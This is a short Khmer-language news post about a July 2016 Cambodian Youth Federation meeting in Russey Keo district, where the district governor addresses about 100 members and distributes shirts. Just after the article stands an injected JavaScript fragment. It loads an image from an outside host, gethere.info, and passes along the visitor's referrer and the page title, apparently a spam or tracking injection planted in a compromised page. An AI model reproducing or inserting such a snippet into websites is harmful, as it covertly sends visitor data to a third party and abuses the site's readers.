ពិធីសំណេះសំណាល ការផ្ដល់ឯកសណ្ឋានយុវជន និងពិសារអាហារសាមគ្គី របស់ សហភាពសហព័ន្ធយុវជនកម្ពុជា ខណ្ឌប្ញស្សីកែវ

ខណ្ឌប្ញស្សីកែវ ៖ នារសៀលថ្ងៃទី១០ ខែកក្កដា ឆ្នាំ២០១៦នេះ លោក ជា ពិសី អភិបាលខណ្ឌឫស្សីកែវ និងជាប្រធាន ស ស យ ក ខណ្ឌឫស្សីកែវ បានដឹកនាំប្រារព្ធ ពិធីសំណេះសំណាលជាមួយ សមាជិក ស ស យ ក ខណ្ឌ-សង្កាត់ សរុបប្រមាណ ១០០នាក់ នៅសាលាខណ្ឌឫស្សីកែវ សាលB។ ក្នុងពិធីសំណេះសំណាល នោះដែរលោកប្រធាន បានមានប្រសាសន៏ថា ក្នុងនាមយើងជាយុវជន យើងត្រូវចូលរួមការងារសង្គម អោយបានច្រើន ម៉្យាងសមាជិកទាំងអស់ជាភ្នែក ជាច្រមុះខ្ញុំ ដូច្នេះបើសមាជិកយើងឃើញឬជួប ប្រទះបញ្ហា អ្វីសូមរាយការណ៏ទៅប្រធានយុវជនសង្កាត់ រួចប្រធានយុវជនសង្កាត់រាយការណ៏មក ខ្ញុំភ្លាមខ្ញុំនិងមានវិធានការ ។ លោកប្រធានអង្គប្រជុំ បានណែនាំបន្តថា ក្នុងនាមយើងជាយុវជន ត្រូវជៀសអោយផុតពីគ្រឿងញៀន និងសូមចូលរួម គោរពច្បាប់ចរាចរណ៏អោយបានគ្រប់ៗគ្នា ។ ក្នុងនោះដែរលោកប្រធានបានបើក អោយសមាជិកចូលរួមបញ្ចេញជាមតិយោបល់ និងលើកពីបញ្ហា ផ្សេងៗជូនអង្គពិធីជ្រាប ហើយលោកប្រធានបាន ធ្វើការដោះស្រាយភ្លាមជូនអង្គពិធី ។ ជាចុង ក្រោយលោកប្រធាន បានចែកអាវ សសយក ជូនដល់ សមាជិកក្នុងម្នាក់អាវមួយ ។ ជាចុងបញ្ចប់ សមាជិក សមាជិកា ទាំងអស់នៃអង្គពិធី ចូលរួមកម្មវិធីពិសារអាហារសាមគ្គី នៅអាហារដ្ឋាន សាច់អាំង គម ៦ បន្តទៀត ។

image image image images.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

អត្ថបទដែលជាប់ទាក់ទង

This website uses cookies to improve your experience. We'll assume you're ok with this, but you can opt-out if you wish. Accept Read More